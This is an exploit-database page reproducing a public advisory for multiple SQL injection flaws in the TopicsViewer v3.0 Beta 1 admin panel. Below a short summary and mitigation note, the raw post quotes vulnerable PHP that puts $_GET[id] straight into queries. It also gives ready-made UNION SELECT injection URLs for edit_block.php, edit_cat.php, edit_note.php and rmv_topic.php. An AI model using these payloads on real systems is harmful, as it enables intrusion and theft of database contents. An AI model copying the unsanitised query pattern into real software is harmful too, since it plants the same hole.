TopicsViewer v3.0 Beta 1 - Multiple Sql Injection Vulnerability

vendor:

TopicsViewer

by:

AtT4CKxT3rR0r1ST

8,8

CVSS

HIGH

Multiple Sql Injection

89, 89, 89, 89

CWE

Product Name: TopicsViewer

Affected Version From: 3.0 Beta 1

Affected Version To: 3.0 Beta 1

Patch Exists: NO

Related CWE: N/A

CPE: a:topicsviewer:topicsviewer:3.0_beta_1

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2020

TopicsViewer v3.0 Beta 1 – Multiple Sql Injection Vulnerability

Multiple Sql Injection vulnerabilities exist in TopicsViewer v3.0 Beta 1 due to improper sanitization of user-supplied input. An attacker can exploit these vulnerabilities by sending specially crafted requests to the vulnerable application. This can allow the attacker to execute arbitrary SQL commands on the underlying database, potentially leading to the disclosure of sensitive information, or the modification of data.

Mitigation:

Input validation should be performed to ensure that untrusted data is not used to construct dynamic SQL queries. Additionally, parameterized queries should be used to prevent SQL injection attacks.

Source

Exploit-DB raw data:

TopicsViewer v3.0 Beta 1   - Multiple Sql Injection Vulnerabilty
===================================================================

####################################################################
.:. Author         : AtT4CKxT3rR0r1ST
.:. Contact        : [F.Hack@w.cn] , [AtT4CKxT3rR0r1ST@gmail.com]
.:. Home           : http://www.iphobos.com/blog/
.:. Script         : http://www.topicsviewer.com/
####################################################################

Multiple Sql Injection
======================

VULNERABILITY
##############
[I] /admincp/edit_block.php (line 46-48)

$sql_b_e = "select * from blocks where b_id = $_GET[id] ";
$result_b_e = @mysql_query ($sql_b_e);
$block = @mysql_fetch_array ($result_b_e);

#########
EXPLOIT
#########
localhost/Path/admincp/edit_block.php?id=1+and+1=2+union+select+1,version(),3,4,5,6,7,8,9,10

VULNERABILITY
##############
[II] /admincp/edit_cat.php (line 77-79)

    $sql = "select * from cat where c_id = $_GET[id]";
    $result = @mysql_query ($sql);
    $cat= @mysql_fetch_array ($result);

#########
EXPLOIT
#########
localhost/Path/admincp/edit_cat.php?id=1+and+1=2+union+select+1,version(),3,4,5,6,7,8

VULNERABILITY
##############
[III] /admincp/edit_note.php (line 77-79)

    $sql = "select * from cat where c_id = $_GET[id]";
    $result = @mysql_query ($sql);
    $cat= @mysql_fetch_array ($result);

#########
EXPLOIT
#########
localhost/Path/admincp/edit_note.php?id=1+and+1=2+union+select+1,version(),3,4,5


VULNERABILITY
##############
[V] /admincp/rmv_topic.php (line 46-47)

    $sql = "select * from topics where t_id = $_GET[id] LIMIT 1 ;";
                 $result = @mysql_query ($sql);

#########
EXPLOIT
#########
localhost/Path/admincp/rmv_topic.php?id=1+and+1=2+union+select+1,version(),3,4,5,6,7,8,9,10,11,12,13,14

####################################################################